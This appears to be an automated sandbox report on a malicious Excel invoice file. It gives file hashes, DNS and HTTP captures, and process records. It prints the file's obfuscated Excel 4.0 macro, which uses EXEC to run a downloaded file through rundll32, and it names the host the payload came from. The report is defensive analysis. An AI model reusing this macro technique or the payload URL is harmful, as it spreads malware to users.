                Entropy (8bit):4.7282044051464736
                Encrypted:false
                SSDEEP:3:oyBVomxWHnKb8W/g4p6YCULE8W/g4p6YCmxWHnKb8W/g4p6YCv:dj0nKbNgkz5ENgkzanKbNgkzs
                MD5:72BF292971159E1F67067B783778231A
                SHA1:FAB451945E815CF506AC41935E3F8AF1B46C4D22
                SHA-256:1751B59DDF72E20449AFEAF5EE7ED65962FCAEA8C35E089E2745CFE8A6C26B6D
                SHA-512:96E536B06D7261A9CB1E4B15706BC8A9AFF91E895FE42E266C32488BD5A654A205BBB93CBED107DCE03A860AE79C540ED57AFF2BD8709F16D7CF45B41997F3B3
                Malicious:false
                Reputation:low
                Preview: Desktop.LNK=0..[misc]..invoice_661434949_67552437.LNK=0..invoice_661434949_67552437.LNK=0..[misc]..invoice_661434949_67552437.LNK=0..
                C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\invoice_661434949_67552437.LNK
                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 26 14:08:12 2020, mtime=Sun Apr 11 06:11:35 2021, atime=Sun Apr 11 06:11:35 2021, length=184279, window=hide
                Category:dropped
                Size (bytes):2198
                Entropy (8bit):4.561386506168734
                Encrypted:false
                SSDEEP:48:84a/XT+NnlBv/3SBqaQh24a/XT+NnlBv/3SBqaQ/:84a/X6NnlBCBqaQh24a/X6NnlBCBqaQ/
                MD5:687051452BC2F77D72B22F577901886B
                SHA1:2415855383CCE43DF59225BB87EA542AC47A6DC5
                SHA-256:569E30D1479F86CD319B1A0C8B13E60FE62637A0E17B9A585AF4CD9371BEFA92
                SHA-512:E9B9814A3FDDB3B31182640EDB9D070D0322CDD467798AB619F9C511F00553B3AE058B8707C042D116118C69A8BA2B086CEEA60A8D509E4B5F8B63EF9D2419FB
                Malicious:false
                Reputation:low
                Preview: L..................F.... ........{....B....~YE.................................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1......Q.y..Desktop.d......QK.X.Q.y*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......2......Ro9 .INVOIC~1.XLS..l.......Q.y.Q.y*...8.....................i.n.v.o.i.c.e._.6.6.1.4.3.4.9.4.9._.6.7.5.5.2.4.3.7...x.l.s.m.......................-...8...[............?J......C:\Users\..#...................\\082561\Users.user\Desktop\invoice_661434949_67552437.xlsm.6.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.i.n.v.o.i.c.e._.6.6.1.4.3.4.9.4.9._.6.7.5.5.2.4.3.7...x.l.s.m.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`
                C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\Y5D8BEZV.txt
                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                File Type:ASCII text
                Category:downloaded
                Size (bytes):117
                Entropy (8bit):4.293191264085757
                Encrypted:false
                SSDEEP:3:GmM/gVXWOg+DTRD7TEVmSVCqvGQQ1cldYUZvcSv:XM/RMRD7gmhEe105Bcc
                MD5:0955DECC24CF4729D752A9B53C933A4D
                SHA1:EBDD0FEAA58E425364A68C558DFA56786E57341F
                SHA-256:C8EEFEF799A43E339F93F6F644595C2648CCB467DE30AA301456BA20111D16C2
                SHA-512:7B515D7B8A9BBED2B24470853CEC750F34F136591002DBA3161B95BF29AEBA7BCD2C70BA6FF698B9ABD355BDA83BB9C0B2B8611640BEDE176743DDD1E64E1E3B
                Malicious:false
                Reputation:low
                IE Cache URL:indianoci.co.uk/
                Preview: __cfduid.d7601f93ca0fb1f83d188dc56224f33f11618092704.indianoci.co.uk/.9728.1979584512.30885353.3901071013.30879393.*.
                C:\Users\user\Desktop\03CE0000
                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                File Type:data
                Category:dropped
                Size (bytes):184279
                Entropy (8bit):7.96535016571193
                Encrypted:false
                SSDEEP:3072:LZnURTKkxqheGLo4/AGG5isVmXBdjHR1QnKq6JeMGhFF:LZn8rV4mnVqbTEnRM+
                MD5:A5BF33A3C05F7D7C3CFA963B69299E5A
                SHA1:C60AC1F23B57458BFA14EC2350D5AC6481FAE008
                SHA-256:7CFD1262A350CBA2D2A46D563F8A296EAF7CD151D6B14E0319003AD5A4D3BCB2
                SHA-512:B5BD5F924CCB9F12926F9055A402EF867C5EFC2C3A8D192C098267E4D59B30DC6AA829E29AC6BAB5E58E9EEEE0348B871C634F64F3BD4D8A7C396E63C80FE8B0
                Malicious:false
                Reputation:low
                Preview: .U.N.0..#.?D....#4j.b.,.$..p..._.u..{..R.*m#....<..oV.TO.Q{..f.*p.+......Y.I8%.w.5 .....?..`Eh.-.S..9G......V.>Z..o.x.r!:.W../..K.R.2.....\,M..+..q.\.?...T...|..D..C...."Q4.......Z..ri.L.!.P..$k..5y....U..hF08Lt.CC.b.{..'...B^....T[.?....T.".;a.-.2......Es.$Wc........2...3..&.{uxD. ....3$?>$.w#').'|..C.....\..w.L....|~..Bs"....<#....R.E.....u.n.=...*..l.o.|..-.1].A......ax..#%..@D....P9tdw.4L....N.S[.:...[b........PK..........!.........f.......[Content_Types].xml ...(...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                C:\Users\user\Desktop\~$invoice_661434949_67552437.xlsm
                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                File Type:data
                Category:dropped
                Size (bytes):330
                Entropy (8bit):1.4377382811115937
                Encrypted:false
                SSDEEP:3:vZ/FFDJw2fj/FFDJw2fV:vBFFGaFFGS
                MD5:96114D75E30EBD26B572C1FC83D1D02E
                SHA1:A44EEBDA5EB09862AC46346227F06F8CFAF19407
                SHA-256:0C6F8CF0E504C17073E4C614C8A7063F194E335D840611EEFA9E29C7CED1A523
                SHA-512:52D33C36DF2A91E63A9B1949FDC5D69E6A3610CD3855A2E3FC25017BF0A12717FC15EB8AC6113DC7D69C06AD4A83FAF0F021AD7C8D30600AA8168348BD0FA9E0
                Malicious:true
                Reputation:high, very likely benign file
                Preview: .user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                C:\Users\user\GVer.iks
                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                File Type:HTML document, ASCII text
                Category:dropped
                Size (bytes):4318
                Entropy (8bit):4.960548542883275
                Encrypted:false
                SSDEEP:96:1j9jwIjYjyDK/DZD8jH+k1sFvJADh/pRsfsIszbGD:1j9jhjYjWK/lyH+kARADh/pmfsIsfGD
                MD5:10E7CF5F758D041A498D76EA11F368BE
                SHA1:3C05C54B7E39AFCE95E60A2A7410194E5AE63CB7
                SHA-256:422424BA14F529B2193794441E7D7EA69E1598D00956375481D83699544B6735
                SHA-512:94277567C383B1C5F30BE977B80660F5D0DD3888FBE2E99BB39397F004AD214CFC40D7ACFE0CCF9DEDF6E5B099DA0D8A4A9D2176B2D75A61EE50AD75BDC1E5EF
                Malicious:false
                Reputation:low
                Preview: <!DOCTYPE html>. [if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->. [if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->. [if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->. [if gt IE 8]> > <html class="no-js" lang="en-US"> <![endif]-->.<head>.<title>Suspected phishing site | Cloudflare</title>.<meta charset="UTF-8" />.<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />.<meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1" />.<meta name="robots" content="noindex, nofollow" />.<meta name="viewport" content="width=device-width,initial-scale=1" />.<link rel="stylesheet" id="cf_styles-css" href="/cdn-cgi/styles/cf.errors.css" type="text/css" media="screen,projection" />. [if lt IE 9]><link rel="stylesheet" id='cf_styles-ie-css' href="/cdn-cgi/styles/cf.errors.ie.css" type="text/css" media="screen,projection" /><![endif]-->.<style type="text/css">body{margin:0;padding:0}</style>...

                Static File Info

                General

                File type:Microsoft Excel 2007+
                Entropy (8bit):7.965561623864126
                TrID:
                • Excel Microsoft Office Open XML Format document (40004/1) 83.33%
                • ZIP compressed archive (8000/1) 16.67%
                File name:invoice_661434949_67552437.xlsm
                File size:184803
                MD5:64f33ccbc7976306417b2b2528daa5fe
                SHA1:d71433580e83ab455556a88c483d1887e9641be6
                SHA256:03a7d4fc0e9d75fb98ca2aba43729acb93803959b1421d8878548643c12e3d73
                SHA512:f111800a5f1de2d2cec569448810eefd8999c99d9e78d5414b3bc662dbb607131a7a69f7236c929b769347d3430c9090c1144a3946c6a2d3d1d7d84236940ecf
                SSDEEP:3072:eSnTKkxqheGLo4/AGG5isVmXBdjHR1QnKq6JeMG9m:eSnrV4mnVqbTEnRML
                File Content Preview:PK..........!."..Z....f.......[Content_Types].xml ...(.........................................................................................................................................................................................................

                File Icon

                Icon Hash:e4e2aa8aa4bcbcac

                Static OLE Info

                General

                Document Type:OpenXML
                Number of OLE Files:1

                OLE File "invoice_661434949_67552437.xlsm"

                Indicators

                Has Summary Info:
                Application Name:
                Encrypted Document:
                Contains Word Document Stream:
                Contains Workbook/Book Stream:
                Contains PowerPoint Document Stream:
                Contains Visio Document Stream:
                Contains ObjectPool Stream:
                Flash Objects Count:
                Contains VBA Macros:

                Macro 4.0 Code

                ,,l,,l,..\GVer.iks,3"=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=EXEC(""rund""&G12&G13&G14&G15&"" ""&F14&"",StartW"")",,2,,=RETURN(),,
                ,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,

                Network Behavior

                Network Port Distribution

                TCP Packets

                TimestampSource PortDest PortSource IPDest IP
                Apr 11, 2021 00:11:44.244446039 CEST4916580192.168.2.22104.21.43.238
                Apr 11, 2021 00:11:44.273181915 CEST8049165104.21.43.238192.168.2.22
                Apr 11, 2021 00:11:44.273291111 CEST4916580192.168.2.22104.21.43.238
                Apr 11, 2021 00:11:44.274460077 CEST4916580192.168.2.22104.21.43.238
                Apr 11, 2021 00:11:44.302973032 CEST8049165104.21.43.238192.168.2.22
                Apr 11, 2021 00:11:44.343449116 CEST8049165104.21.43.238192.168.2.22
                Apr 11, 2021 00:11:44.343504906 CEST8049165104.21.43.238192.168.2.22
                Apr 11, 2021 00:11:44.343533993 CEST8049165104.21.43.238192.168.2.22
                Apr 11, 2021 00:11:44.343570948 CEST4916580192.168.2.22104.21.43.238
                Apr 11, 2021 00:11:44.343597889 CEST4916580192.168.2.22104.21.43.238
                Apr 11, 2021 00:11:44.343604088 CEST4916580192.168.2.22104.21.43.238
                Apr 11, 2021 00:13:44.131885052 CEST4916580192.168.2.22104.21.43.238
                Apr 11, 2021 00:13:44.161051035 CEST8049165104.21.43.238192.168.2.22
                Apr 11, 2021 00:13:44.161395073 CEST4916580192.168.2.22104.21.43.238

                UDP Packets

                TimestampSource PortDest PortSource IPDest IP
                Apr 11, 2021 00:11:44.184062958 CEST5219753192.168.2.228.8.8.8
                Apr 11, 2021 00:11:44.222151041 CEST53521978.8.8.8192.168.2.22

                DNS Queries

                TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                Apr 11, 2021 00:11:44.184062958 CEST192.168.2.228.8.8.80xb648Standard query (0)indianoci.co.ukA (IP address)IN (0x0001)

                DNS Answers

                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                Apr 11, 2021 00:11:44.222151041 CEST8.8.8.8192.168.2.220xb648No error (0)indianoci.co.uk104.21.43.238A (IP address)IN (0x0001)
                Apr 11, 2021 00:11:44.222151041 CEST8.8.8.8192.168.2.220xb648No error (0)indianoci.co.uk172.67.189.4A (IP address)IN (0x0001)

                HTTP Request Dependency Graph

                • indianoci.co.uk

                HTTP Packets

                Session IDSource IPSource PortDestination IPDestination PortProcess
                0192.168.2.2249165104.21.43.23880C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                TimestampkBytes transferredDirectionData
                Apr 11, 2021 00:11:44.274460077 CEST0OUTGET /ufriends/support.php HTTP/1.1
                Accept: */*
                UA-CPU: AMD64
                Accept-Encoding: gzip, deflate
                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                Host: indianoci.co.uk
                Connection: Keep-Alive
                Apr 11, 2021 00:11:44.343449116 CEST2INHTTP/1.1 200 OK
                Date: Sat, 10 Apr 2021 22:11:44 GMT
                Content-Type: text/html; charset=UTF-8
                Transfer-Encoding: chunked
                Connection: keep-alive
                Set-Cookie: __cfduid=d7601f93ca0fb1f83d188dc56224f33f11618092704; expires=Mon, 10-May-21 22:11:44 GMT; path=/; domain=.indianoci.co.uk; HttpOnly; SameSite=Lax
                X-Frame-Options: SAMEORIGIN
                cf-request-id: 095f705a230000edb33a34f000000001
                Report-To: {"group":"cf-nel","endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=SrlLoXIwKHY4fkFS9zvYcogA5kjP2qFYmIdkP0voIX0MeErKMuvzpWcku08f%2BnwiHhp8V1%2BLeOJSpGYe5JLUwW9o2pMJmG3nHElMT7gBUDE%3D"}],"max_age":604800}
                NEL: {"report_to":"cf-nel","max_age":604800}
                Server: cloudflare
                CF-RAY: 63df5009dba8edb3-CDG
                Content-Encoding: gzip
                alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
                Data Raw: 36 63 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 c5 58 61 6f dc 36 12 fd be bf 62 ac 03 ea 04 30 a5 b5 1d d7 1b 5b ab 43 2f 71 0b 03 2d 6a 5c 1c e4 8a 22 30 28 72 24 31 a6 48 85 a4 76 bd 48 f3 df 0f a4 b8 6b ed da 4e eb 7e 29 60 c0 22 39 7c 9c 19 be 37 24 37 df 7b fb eb 9b eb df ae 2e a0 71 ad 2c 26 f9 1e 21 bf 8b 0a a4 83 cb 0b 38 fd 58 40 ee 07 80 49 6a ed 3c 51 9a 7c b2 20 f0 7b d0 92 0b 4c 40 52 55 cf 13 54 e4 fd bb a4 80 7c ef 77 54 5c 54 1f 09 b9 87 8a 38 00 8f 43 9d 3e 0f 6a f6 0d a8 d9 33 a0 6a 17 d1 7c c7 63 51 3e 44 21 64 1b a9 41 ca 8b 49 ee 84 93 58 bc eb 6d 87 cc 21 87 ae 11 b6 11 aa 06 2b 1c c2 1f f0 46 ea 9e 57 92 1a cc b3 c1 76 92 b7 e8 28 b0 86 1a 8b 6e 9e bc bf fe 91 cc 12 c8 d6 03 8d 73 1d c1 cf bd 58 cc 93 37 5a 39 54 8e 5c af 3a 4c 80 0d ad 79 e2 f0 ce 65 de e7 f3 0d cc b7 50 fe 47 de ff 40 de e8 b6 a3 4e 94 72 0c 74 79 31 bf e0 35 1e b0 c6 e8 16 e7 87 23 00 45 5b 9c 27 46 97 da d9 d1 0c a5 85 e2 78 77 00 4a 57 5a 4a bd 7c 30 65 21 70 d9 69 e3 46 93 96 82 bb 66 ce 71 21 18 92 d0 38 10 4a 38 41 25 b1 8c ca cd c2 52 a8 5b 30 28 e7 89 75 2b 89 b6 41 74 09 08 3e 4f 58 75 33 74 11 66 6d 02 8d c1 6a 9e 64 8c 2b c2 6a 91 0d 43 19 ab 52 34 46 1b 9b 06 23 b7 ea 30 e6 2a b4 5b e4 82 ce 13 cb 0c a2 3a e8 8c fe 84 cc 09 ad 86 b5 b7 a8 ff fa 63 f1 b4 33 fb f7 ce 08 f4 fe ec ff a9 3f 02 9f ef d2 36 dd 02 e4 ee fc a2 d4 7c f5 a5 a5 a6 16 ea 6c 7a de 51 ce 85 aa cf a6 5f f3 c1 85 62 32 19 51 1e 7d 64 87 d3 48 fa 49 6e 99 11 9d 2b 26 00 a2 82 17 7b 8a 2e 44 4d 9d 36 29 d3 fa 56 e0 85 a2 a5 44 fe 12 be 4c bc e6 96 42 71 bd 4c 29 e7 17 0b 54 ee
                Data Ascii: 6cdXao6b0[C/q-j\"0(r$1HvHkN~)`"9|7$7{.q,&!8X@Ij<Q| {L@RUT|wT\T8C>j3j|cQ>D!dAIXm!+FWv(nsX7Z9T\:LyePG@Nrty15#E['FxwJWZJ|0e!piFfq!8J8A%R[0(u+At>OXu3tfmjd+jCR4F#0*[:c3?6|lzQ_b2Q}dHIn+&{.DM6)VDLBqL)T
                Apr 11, 2021 00:11:44.343504906 CEST3INData Raw: 67 61 1d 2a 34 2f f6 df fe fa 4b a4 e9 cf 9a 72 e4 fb 07 50 f5 2a 84 01 2f d6 b3 01 16 d4 40 04 96 30 07 ae 59 df a2 72 69 8d ee 42 a2 ff fc cf ea 92 bf d8 1f 6c 08 95 68 dc fe cb f3 38 7b 3d 33 0d 71 a5 5c d8 4e d2 15 cc 61 bf 94 9a dd ee 0f 76
                Data Ascii: ga*4/KrP*/@0YriBlh8{=3q\Nav__NNlN&ysXD]&)\UUK ak}3zQUVRF6)$R0tHmg\,F~D*Bz]nA(q{1|zKx3\l`Zc>VIg(OM
                Apr 11, 2021 00:11:44.343533993 CEST3INData Raw: 30 0d 0a 0d 0a
                Data Ascii: 0


                Code Manipulations

                Statistics

                CPU Usage

                Click to jump to process

                Memory Usage

                Click to jump to process

                High Level Behavior Distribution

                Click to dive into process behavior distribution

                Behavior

                Click to jump to process

                System Behavior

                General

                Start time:00:11:33
                Start date:11/04/2021
                Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                Wow64 process (32bit):false
                Commandline:'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
                Imagebase:0x13fc80000
                File size:27641504 bytes
                MD5 hash:5FB0A0F93382ECD19F5F499A5CAA59F0
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high

                General

                Start time:00:11:35
                Start date:11/04/2021
                Path:C:\Windows\System32\rundll32.exe
                Wow64 process (32bit):false
                Commandline:rundll32 ..\GVer.iks,StartW
                Imagebase:0xff090000
                File size:45568 bytes
                MD5 hash:DD81D91FF3B0763C392422865C9AC12E
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high

                Disassembly

                Code Analysis

                Reset < >